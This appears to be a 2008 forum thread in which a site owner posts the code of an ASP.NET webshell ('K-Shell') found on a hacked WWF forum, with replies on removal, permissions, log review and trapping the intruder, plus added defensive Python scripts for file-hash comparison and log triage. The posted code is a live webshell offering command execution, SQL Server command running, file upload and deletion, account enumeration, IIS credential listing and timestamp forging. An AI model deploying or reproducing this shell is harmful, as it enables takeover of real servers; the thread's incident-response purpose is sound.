		<td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
	</tr>
</table>
<%
	case "cmd"
%>
<form runat="server">
  <p>[ CMD.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>  
  <p>
   <asp:Label ID="result" runat="server" style="style2"/>      </p>
</form>
<%
	case "cmdw32"
%>
<form runat="server">
	<p>[ ASP.NET W32 Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  	<p>
    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
	case "cmdwsh"
%>
<form runat="server">
	<p>[ ASP.NET WSH Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  	<p>
    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
	case "pro"
%>
<form runat="server">
	<p align=center>[ List processes from server ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				Try
				output_wmi_function_data("Win32_Process","Name,ProcessId,HandleCount")
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "user"
%>
<form runat="server">
	<p align=center>[ List User Accounts ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_UserAccount"		
				dim Fields_to_load = "Name,Domain,FullName,Description,SID"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data(WMI_function,Fields_to_load)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "applog"
%>
<form runat="server">
	<p align=center>[ List Application Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"		
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "syslog"
%>
<form runat="server">
	<p align=center>[ List System Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				dim WMI_function = "Win32_NTLogEvent where Logfile='System'"		
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"
				
				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "auser"
%>
<form runat="server">
	<p align=center>[ IIS List Anonymous' User details ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<% 
				Try
				IIS_list_Anon_Name_Pass
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "sqlrootkit"
%>
<form runat="server">
  <p>[ SqlRootKit.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>  
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
</form>
<%
	case "del"
		dim a as string
		a=request.QueryString("src")
		call existdir(a)
		call del(a)  
		response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
	case "copy"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "cut"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "plaster"
		dim ow as integer
		if request.Form("OverWrite")<>"" then ow=1
		if request.Form("Cancel")<>"" then ow=2
		url=request.QueryString("src")
		call existdir(url)
		dim d as string
		d=session("cutboard")
		if left(d,1)="" then
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & replace(path.getfilename(d),"","")
			if right(d,1)="\" then   
				call xexistdir(TEMP1,ow)
				directory.move(replace(d,"",""),TEMP1 & "\")  
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.move(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		else
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & path.getfilename(replace(d,"",""))
			if right(d,1)="\" then 
				call xexistdir(TEMP1,ow)
				directory.createdirectory(TEMP1)
				call copydir(replace(d,"",""),TEMP1 & "\")
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.copy(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		end if
	case "upfile"
		url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
 You will upload file to this directory : <span class="style3"><%=url%></span><br>
 Please choose file from your computer :
 <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
<%
	case "new"
		url=request.QueryString("src")
%>
<form runat="server">
  <%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/> 
  <br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>  
  <input name="Src" type="hidden" value="<%=url%>">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
	case "edit"
		dim b as string
		b=request.QueryString("src")
		call existdir(b)
		dim myread as new streamreader(b,encoding.default)
		filepath.text=b
		content.text=myread.readtoend
%>
<form runat="server">
  <table width="80%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td> 
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>         
      </td>
    </tr>
  </table>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
  		myread.close
	case "rename"
		url=request.QueryString("src")
		if request.Form("name")="" then
	%>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox">
    <input type="submit" name="Submit3" value="Submit" class="buttom">
</p>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
		else
			if Rename() then
				response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			else
				response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			end if
		end if
	case "samename"
		url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
   <%
    case "clonetime"
		time1.Text=request.QueryString("src")&"kshell.aspx"
		time2.Text=request.QueryString("src")
	%>
<form runat="server">
  <p>[CloneTime for WebAdmin]<i>      <a href="javascript:history.back(1);">Back</a></i> </p>
  <p>A tool that it copy the file or directory's time to another file or directory </p>
  <p>Rework File or Dir:
    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  <p>Copied File or Dir:     
    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
</form>
<p>
  <%
	case "logout"
   		session.Abandon()
		response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
	end select
end if
Catch error_x
	response.Write("<font color=""red"">Wrong: </font>"&error_x.Message)
End Try
%>
</p>
</p>
<hr>
<script language="javascript">
function closewindow()
{self.close();}
</script>
</body>
</html>
  Re: WWF 9.53 forum infected with K-SHELL, how to fix it 24/11/2008 14:33:10 (+0700) | #2 | 160041
BachDuongTM
Member

This is a public .aspx webshell that has been published fairly widely; the name K-shell is probably just a rename for fun.

Back to the main issue: the question is how you want to fix it. If it is just deleting the shell file, that is simple, but securing the site so it is not attacked again is harder. At least for now, you do not know how the shell got uploaded to the server, and that is still a noose hanging there.


From my experience with Server 2k3, I have a few things to share:

1. Make sure the code is written as well as possible, both in how it works and in security.
2. Finish the code locally.
3. Upload the code to the web directory on the server and set the permissions sensibly.
4. The code directory is read-only for the site user, which is usually the IIS guest.
5. The code directory is read-write for the FTP user so the code can be edited.
6. The code directory contains an additional upload directory. This is a special directory: the site user can write and delete there, but IIS runs in no-script mode for it, meaning that even if .aspx code is uploaded there, IIS treats it as an ordinary text file. This directory is used for content uploaded by members.
7. For .php code the above is enough to keep the site safe, but aspx code runs under its own identity, which I once verified to be on par with system privileges; so, since misfortunes never come alone, also add a deny-edit entry for system on the code directory. And hope your policy has no holes.

8. Pray.
  Re: WWF 9.53 forum infected with K-SHELL, how to fix it 25/11/2008 02:59:55 (+0700) | #3 | 160087
ktstbniit
Member

My website is hosted with Nhân Hòa. I looked in cPanel and could not find anywhere to set permissions. As for the WWF code, I checked it: the few modules that allow uploads block it and only allow image files; I tried renaming that file to a .jpg extension and it still could not be uploaded. I have also checked the RTEditor.

The other items you mentioned are too hard; I don't think they can be done with cPanel. So I am using the method number 8 that you listed.

If there is another way, please help me out. Thanks
  Re: WWF 9.53 forum infected with K-SHELL, how to fix it 26/11/2008 05:04:37 (+0700) | #4 | 160254
azteam
Member

Besides the points BachDuongTM raised, I also have a few suggestions:
- For now, back up the source and check it carefully to see whether anything is different, and check the web log files to see how that file was uploaded to the host.
- If I am not mistaken, the WWF forum runs on .asp. If it only runs .asp, it is best to set Website Extensions to allow only asp and drop asp.net and php.
- Protection against k-shell usually comes from the hosting provider (running .NET with trust level = medium, not allowing webconfig to be overwritten, ...). If you cannot handle it yourself, it is best to contact the hosting provider and deal with it together.
- If you are on shared hosting, securing the host is very difficult and not very feasible.
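An added example, not part of the thread or of WWF: one way to do the backup comparison azteam describes. It compares file content by hash rather than by date, because the posted shell's CloneTime form copies one file's timestamps onto another; the two directory arguments (a copy known to be clean, and the live web root) and the extension list are assumptions.

```python
import hashlib
import os

# Assumption: extensions this server could execute as server-side code.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx", ".ashx", ".asmx", ".php"}


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(65536), b""):
            digest.update(block)
    return digest.hexdigest()


def manifest(root):
    """Map relative path (lower-cased, '/'-separated) to SHA-256 for every file under root."""
    entries = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/").lower()
            entries[rel] = sha256_of(full)
    return entries


def ext(path):
    return os.path.splitext(path)[1]


def compare_trees(baseline_root, live_root):
    """Diff the live web root against a known-good copy by content, never by timestamp."""
    base, live = manifest(baseline_root), manifest(live_root)
    added = sorted(set(live) - set(base))
    changed = sorted(p for p in set(base) & set(live) if base[p] != live[p])
    removed = sorted(set(base) - set(live))
    # Script types the clean copy never used at all, e.g. .aspx in an .asp-only forum.
    foreign = sorted({ext(p) for p in added if ext(p) in SCRIPT_EXTS} - {ext(p) for p in base})
    return {
        "added": added,
        "changed": changed,
        "removed": removed,
        "review_first": sorted(p for p in added + changed if ext(p) in SCRIPT_EXTS),
        "foreign_script_types": foreign,
    }


if __name__ == "__main__":
    import sys
    for section, items in compare_trees(sys.argv[1], sys.argv[2]).items():
        print(f"[{section}]")
        for item in items:
            print("   ", item)
```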
  Re: WWF 9.53 forum infected with K-SHELL, how to fix it 26/11/2008 05:58:02 (+0700) | #5 | 160261
gamma95
Researcher

@ktstbniit: What is Kshell that it can "infect" WWF? And above all, why did you post the code here? ... To see where its spreading code is, I suppose??
If it is not clear how they managed to upload the backdoor, try this approach:

The hacker did not deface the site but left a backdoor, so he will probably come back. Modify the kshell backdoor a little to trap him (record IP, referer, etc.) into a secret log file (whenever a request hits this file) and break the backdoor's code. The backdoor then no longer works --> the hacker will certainly upload another one --> at that point you have enough logs (IP, referer, cookie, etc.) to search the logs and see how he managed to upload that backdoor. You might even pick up a few of the hacker's skills, or swipe the 0-day he used for the hack.
[idle chatter]
I was once tracked by a "big-name" guy using this trick; luckily I spotted his trap, and in the end his trap only caught a piece of advice from me.
[/idle chatter]
Wings that never tire
lol
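An added example, not part of the thread: the log search that azteam and gamma95 both point to, run over IIS W3C extended logs. The sample log is constructed (documentation IP ranges, a made-up upload page name and shell location); only the file name dbcn.aspx and the `action` query parameter come from the posted code.

```python
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format. IPs are documentation ranges and
# /forum/hypothetical_upload.asp is a made-up page name, not a real WWF file.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2008-11-20 03:10:01 198.51.100.7 GET /forum/default.asp - 200 Mozilla/4.0
2008-11-20 03:12:44 203.0.113.9 GET /forum/default.asp - 200 Mozilla/5.0
2008-11-20 03:14:02 203.0.113.9 POST /forum/hypothetical_upload.asp - 200 Mozilla/5.0
2008-11-20 03:14:30 203.0.113.9 GET /forum/uploads/dbcn.aspx - 200 Mozilla/5.0
2008-11-20 03:15:10 203.0.113.9 POST /forum/uploads/dbcn.aspx - 200 Mozilla/5.0
2008-11-20 03:16:00 203.0.113.9 GET /forum/uploads/dbcn.aspx action=cmd 200 Mozilla/5.0
2008-11-22 21:40:13 192.0.2.55 GET /forum/uploads/dbcn.aspx action=goto&src=C%3A%5C 200 Mozilla/5.0
2008-11-22 21:41:00 198.51.100.7 POST /forum/post.asp - 200 Mozilla/4.0
"""


def parse_w3c(text):
    """Yield one dict per request, using the most recent #Fields directive as column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):      # skip truncated or malformed rows
                rec = dict(zip(fields, values))
                rec["ts"] = rec["date"] + " " + rec["time"]
                yield rec


def triage(records, shell_name):
    """Summarise who used the shell and what those clients did before their first hit."""
    records = sorted(records, key=lambda r: r["ts"])
    suffix = "/" + shell_name.lower()
    shell_hits = [r for r in records if r["cs-uri-stem"].lower().endswith(suffix)]
    first_hit = {}                               # c-ip -> time of its first shell request
    actions = Counter()                          # which shell functions were opened
    for r in shell_hits:
        first_hit.setdefault(r["c-ip"], r["ts"])
        for value in parse_qs(r["cs-uri-query"]).get("action", []):
            actions[value] += 1
    lead_up = [r for r in records
               if r["c-ip"] in first_hit and r["ts"] < first_hit[r["c-ip"]]]
    return {
        "first_seen": shell_hits[0]["ts"] if shell_hits else None,
        "shell_ips": sorted(first_hit),
        "actions": dict(actions),
        "upload_candidates": [(r["ts"], r["c-ip"], r["cs-uri-stem"])
                              for r in lead_up if r["cs-method"] == "POST"],
    }


if __name__ == "__main__":
    for key, value in triage(parse_w3c(SAMPLE_LOG), "dbcn.aspx").items():
        print(key, "=", value)
```

The client that uploaded the file may not be the one that later used it, so if `upload_candidates` is empty, review every POST logged shortly before `first_seen`.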
  Re: WWF 9.53 forum infected with K-SHELL, how to fix it 27/11/2008 03:20:05 (+0700) | #6 | 160367
conmale
Administrator

gamma95 wrote:
@ktstbniit: What is Kshell that it can "infect" WWF? And above all, why did you post the code here? ... To see where its spreading code is, I suppose??
If it is not clear how they managed to upload the backdoor, try this approach:

The hacker did not deface the site but left a backdoor, so he will probably come back. Modify the kshell backdoor a little to trap him (record IP, referer, etc.) into a secret log file (whenever a request hits this file) and break the backdoor's code. The backdoor then no longer works --> the hacker will certainly upload another one --> at that point you have enough logs (IP, referer, cookie, etc.) to search the logs and see how he managed to upload that backdoor. You might even pick up a few of the hacker's skills, or swipe the 0-day he used for the hack.
[idle chatter]
I was once tracked by a "big-name" guy using this trick; luckily I spotted his trap, and in the end his trap only caught a piece of advice from me.
[/idle chatter]


Heh heh, usually when people end up in this situation they panic. Most delete it right away, or even shut the service down; hardly anyone stays calm enough to use the "beat them with their own stick" trick. From what I see, shells that are used by taking someone else's and then finding a way to upload it to some vulnerable server to... "mess around" very rarely involve a 0-day.
What bringing us together is stronger than what pulling us apart.